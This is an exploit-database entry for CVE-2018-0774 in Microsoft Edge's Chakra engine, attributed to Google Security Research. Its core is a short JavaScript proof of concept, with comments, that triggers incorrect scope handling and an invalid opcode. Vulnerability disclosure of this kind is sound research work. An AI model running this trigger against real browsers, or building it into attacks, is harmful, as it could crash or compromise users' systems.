Microsoft Edge Chakra - Incorrect Scope Handling
| EKU-ID: 7273 | CVE: 2018-0774 | OSVDB-ID: |
| Author: Google Security Research | Published: 2018-01-18 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 7273 | CVE: 2018-0774 | OSVDB-ID: |
| Author: Google Security Research | Published: 2018-01-18 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
// PoC:
(function func(arg = function () {
print(func); // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
print(func);
function func() {
}
})();
// Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.